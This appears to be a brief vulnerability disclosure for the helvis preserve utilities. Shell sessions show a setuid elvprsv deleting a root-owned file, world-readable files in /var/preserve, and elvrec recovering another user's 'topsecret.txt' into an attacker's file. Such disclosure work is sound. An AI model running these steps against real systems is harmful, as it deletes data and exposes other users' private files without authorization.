One example why elvprsv should not have setuid permissions: su-3.00# dd if=/dev/zero of=/tmp/a count=1 bs=2048 1+0 records in 1+0 records out 2048 bytes transferred in 0.000115 secs (17784544 bytes/sec) su-3.00# perl -e 'print "A" x 12345' >> /tmp/a su-3.00# ls -al /tmp/a -rw-r--r-- 1 root wheel 14393 Nov 11 19:16 /tmp/a su-3.00# su nielsh su-3.00$ /usr/local/bin/elvprsv /tmp/a su-3.00$ ls -al /tmp/a ls: /tmp/a: No such file or directory su-3.00$ Insecure permissions are used on preserved emails: su-3.00$ ls -al /var/preserve/ total 22 drwxr-xr-x 2 root wheel 512 Nov 11 19:14 . drwxr-xr-x 24 root wheel 512 Nov 11 18:09 .. -rw-r--r-- 1 root wheel 664 Nov 5 15:09 Index -rw-r--r-- 1 root wheel 15 Nov 5 14:46 p0 -rw-r--r-- 1 root wheel 15 Nov 5 14:49 p141 -rw-r--r-- 1 root wheel 15 Nov 5 14:50 p213 -rw-r--r-- 1 root wheel 15 Nov 5 14:50 p285 -rw-r--r-- 1 root wheel 15 Nov 5 14:51 p357 -rw-r--r-- 1 root wheel 15 Nov 5 14:52 p429 -rw-r--r-- 1 root wheel 15 Nov 5 15:09 p501 -rw-r--r-- 1 root wheel 15 Nov 5 14:48 p70 su-3.00$ A reason to also have a closer look to elvrec is that you can recover files that belong to others: $ id uid=1002(testuser) gid=1003(testuser) groups=1003(testuser) $ pwd /home/testuser bash-3.00$ helvis topsecret.txt 1) now kill the process 2) elvprs should be executed, its recommended bythe author that this is done automaticly at boot time bash-3.00$ id uid=899(nielsh) gid=1001(nielsh) groups=1001(nielsh), 0(wheel) bash-3.00$ elvrec /usr/ports/korean/helvis/work/helvis-1.8h2-/rrrr.txt /usr/ports/korean/helvis/work/helvis-1.8h2-/tast.txt /usr/home/testuser/topsecret.txt bash-3.00$ touch /tmp/showme.txt bash-3.00$ elvrec /usr/home/testuser/topsecret.txt /tmp/showme.txt bash-3.00$ cat /tmp/showme.txt This is topsecret information !!!!! bash-3.00$